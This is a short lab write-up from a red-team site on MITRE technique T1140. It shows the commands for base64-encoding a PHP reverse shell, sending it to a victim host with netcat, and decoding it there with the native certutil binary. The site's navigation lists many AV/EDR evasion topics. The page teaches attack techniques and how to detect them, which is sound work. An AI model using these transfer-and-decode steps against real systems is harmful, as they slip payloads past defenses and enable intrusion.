Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is this iRed.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
AV Bypass with Metasploit Templates and Custom Binaries
Evading Windows Defender with 1 Byte Change
Bypassing Windows Defender: One TCP Socket Away From Meterpreter and Beacon Sessions
Bypassing Cylance and other AVs/EDRs by Unhooking Windows APIs
Windows API Hashing in Malware
Detecting Hooked Syscalls
Calling Syscalls Directly from Visual Studio to Bypass AVs/EDRs
Retrieving ntdll Syscall Stubs from Disk at Run-time
Full DLL Unhooking with C++
Enumerating RWX Protected Memory Regions for Code Injection
Disabling Windows Event Logs by Suspending EventLog Service Threads
T1027: Obfuscated Powershell Invocations
Masquerading Processes in Userland via _PEB
Commandline Obfusaction
File Smuggling with HTML and JavaScript
T1099: Timestomping
T1096: Alternate Data Streams
T1158: Hidden Files
T1140: Encode/Decode Data with Certutil
Downloading Files with Certutil
T1045: Packed Binaries
Unloading Sysmon Driver
Bypassing IDS Signatures with Simple Reverse Shells
Preventing 3rd Party DLLs from Injecting into your Malware
ProcessDynamicCodePolicy: Arbitrary Code Guard (ACG)
Parent Process ID (PPID) Spoofing
Executing C# Assemblies from Jscript and wscript with DotNetToJscript
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

T1140: Encode/Decode Data with Certutil

Defense Evasion

In this lab I will transfer a base64 encoded php reverse shell from my attacking machine to the victim machine via netcat and decode the data on the victim system using a native windows binary certutil.

Execution

Preview of the content to be encoded on the attacking system:

Sending the above shell as a base64 encoded string to the victim system (victim is listening and waiting for the file with nc -l 4444 > enc):

attacker@local
base64 < shell.php.gif | nc 10.0.0.2 4444

Once the file is received on the victim, let's check its contents:

attacker@victim
certutil.exe -decode .\enc dec

Let's decode the data:

attacker@victim
certutil.exe -decode .\enc dec

Let's have a look at the contents of the file dec which now contains the base64 decoded shell:

References

Previous
T1158: Hidden Files
Next
Downloading Files with Certutil
Last updated 2 years ago
Contents
Execution
References